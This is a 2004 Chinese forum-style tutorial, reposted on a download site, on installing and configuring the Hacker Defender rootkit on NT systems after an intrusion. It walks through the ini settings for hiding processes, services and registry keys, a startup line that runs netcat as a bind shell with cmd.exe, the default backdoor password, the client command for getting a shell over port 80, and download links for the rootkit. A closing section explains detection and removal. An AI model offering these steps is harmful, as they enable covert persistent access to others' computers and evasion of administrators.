介绍一个运行在NT系统下内核级Rootkit及删除方法 -pc6资讯

您的位置：首页 → 网络冲浪 → 黑客天空 → 介绍一个运行在NT系统下内核级Rootkit及删除方法

介绍一个运行在NT系统下内核级Rootkit及删除方法 时间：2004/10/8 16:38:00来源：本站整理作者：蓝点我要评论(1)

介绍一个运行在NT系统下内核级Rootkit及删除方法

入侵了一台电脑后，我们总想留个后门，方便以后进来，现在网上有非常多的免费的
后门，我用了一下，都比较容易被查出来，（如用Fport就可以看见哪个程序打开了哪个端口）,
Lion 的Ping 后门，虽然不开端口，但是还是增加了一个ssms服务亮眼人一下子就会发现的，
在网上找了好久，终于让我找到了一个非常好的Rootkit 呵呵！这就是 "Hacker Defender" 目
前的版本是 0.73 大家可以在 http://rootkit.host.sk/ (一些朋友需要代理才能访问的) 下载
到这个 Rootkit。
这个Rootkit 究竟有什么特殊的功能呢？首先下载解压后我们来看一下，应该有以下的文件：
------------------------------------------------------------------
hxdef073.exe 50 688 b - program Hacker defender v0.7.3
hxdef073.ini 1 661 b - inifile with default settings
bdcli073.exe 30 208 b - backdoor client
rdrbs073.exe 48 640 b - redirectors base
readmecz.txt 15 553 b - czech version of help file
readmeen.txt 15 523 b - help file
-------------------------------------------------------------------
hxdef073 是主程序，大家不要运行！！！！
hxdef073.ini 是配置文件
bdcli073.exe 连接后门用客户端
rdrbs073.exe 转向程序(类似与端口转发)
readmecz.txt 捷克斯洛伐克语说明文件
readmeen.txt 英语说明文件

我们要用Rootkit 先要配置一下ini 文件打开 hxdef073.ini 我简单的介绍
一下各个说明选项
--------------------------------------------------------------
[Hidden Table] ；要隐藏的列表，支持通配符，比如这里所
hxdef* ；hxdef 开头的都将不在任务管理器及资源管理
rcmd.exe ；器里出现，大家可以自己在这里添加要隐藏的
；文件，目录及进程，一个一行
[Root Processes] ；这里是能够看见隐藏列表里进程，支持通配符
hxdef* ;比如，我喜欢用Wollf ，那就把wollf.exe 加
rcmd.exe ；到这里,这样telnet 到Wollf里就可以看见隐藏
；在列表里的冬冬。
[Hidden Services] ；这里是要隐藏服务的列表，支持通配符，
HackerDefender* ；这里有点问题，我下面会讲

[Hidden RegKeys] ：这里是隐藏注册表的Regkey
HackerDefender073
LEGACY_HACKERDEFENDER073

[Hidden Regvalues] ;这里是隐藏注册表的 values

[Startup Run] :这是Rootkit 启动后要运行什么冬冬就把他加到这里
;比如 c:sys
c.exe?-L -p 100 -t -e cmd.exe
;这样nc在Rootkit 启动后就会运行并兼听 100

[Settings]
Password=hxdef-rulez ;这里设置连接后门用密码，大家自己改吧:)
BackdoorShell=hxdef?.exe ;连进来后shell 的名字，Rootkit会把CMD.EXE复制一份；一个份，运行完毕后就会删掉的
ServiceName=HackerDefender073 ；安装的服务名称
DisplayName=HXD Service 073 ；显示的服务名称
ServiceDescription=powerful NT rootkit ；服务的描述。

[Comments] ；注解
--------------------------------------------------------------------
大家把ini 文件配置好后，把
hxdef073.exe
hxdef073.ini
Copy 到对方的机器上运行就可以了，不需要重启机器，Rootkit就会开始工作了！
如果对方开了WWW, FTP, SMTP 我们就可以用 bdcli073.exe连上去
用法 :bdcli073 IP 端口密码
比如对方的IP是192.168.0.1 www 端口开在 80 ，Rootkit 的密码是 hxdef-rulez
那我们就可以开个CMD,用这样 "bdcli073 192.168.0.1 80 hxdef-rulez"
一会儿对方的 "c:winntsystem32"就会出现在我们面前，这可是用 80 端口通讯的，
可以穿过一些防火墙，呵呵！我自己测试。53端口的DNS 服务也可以作为通讯端口，
哈哈！比一般的后门要强多了吧，不开新的端口，而且Administrator用系统自带的工
具查不到我们隐藏的文件，进程，及服务！！！对是服务，哈哈种上 Wollf，
Administrator 在服务管理器里也看不见！！那不是天下无敌！！NO!NO!NO!
因为一些原因在这里还有一些破绽，虽然Administrator在任务管理器里看不见
Wollf 这个进程，但是 Fport 却可以看见 wollf 兼听7614 这个端口，晕~ 但是
作者在他的主页写下，他正在增加这个功能，下一个版本将会增加一些代码，到时
netstat -a -n 与 Fport 等工具将发现不了被隐藏的端口，（本来这篇文章想在新
版本发布时再写的，不过我自己在木马论坛(bbs.mmbest.com 做一下广告)说漏了嘴，
导致了这篇文章的早产 :)）还有一些破绽，因为Rootkit 自身的原因导致了 "it
is possible to hide registry keys and values, services and files during
remote sessions."(这是原文大家自己查字典吧)其实就是无法完美的隐藏,
我测试过"DameWare NT Utilities"&srvinstw.exe （W2k Resource Kit 里的工具）
可以看见隐藏的服务，但看不见隐藏的进程,这是不完美的，因此我们可以
用 "DameWare NT Utilities"&srvinstw.exe 来删除这个 Rootkit运行srvinstw.exe,
选择remove a service,然后选择 HackerDefender073, 同样用 sc.exe 也可以做到，
前提是你知道 Rootkit的安装服务的名字，也许黑客把他会改成其他的名字，呵呵那好办，
打开服务管理器和srvinstw.exe 两个一对照，有那个服务出现在 srvinstw.exe而没有
出现在服务管理器里那么你就要注意了！！记下文件的路径和文件名，用软盘启动
，因为那样是不会启动 Rootkit 的找一下有没有和那个文件名相同的ini ，如果有，
打开来看看里面是什么？删除的方法也很简单，把 exe 和同名的 ini 文件删掉就可以
了，这样 Rootkit再下一次启动时就不会运行了，最好推荐重装系统，谁知道还留下了
其它的什么后门，而且如果是2k你的密码多半被人知道了，再加上克隆账号 HoHo~
我不知道了........

后记：本来不怎么想写这篇文章的，写出来，国内的很多机器又要遭殃了，我真的
不知道我写这篇文章是对还是错，一些好的网管，也许提高了安全意识，而另一些对
安全所谓的，写也是白写，有些人只要用一下冰河就可以把一些网站玩弄在手掌上，
如果被人种上这个 Rootkit.......

还有我本人是菜鸟一个，跟这个作者一点点关系也没有，虽然很想写一个这样的Rootkit
可是水平太低，远远不够。作者在主页里写道下一个版本将在3.1 号发布，感兴趣的朋
友可以关注一下作者的主页，不能访问作者主页的朋友，我已经把这个放到我的主页空间
里了，大家可以通过以下连接下载 http://rootkit.go.3322.org/rootkit/hxdef073.zip

文章评论

查看所有1条评论>>

热门文章 黑客大战直播网址黑客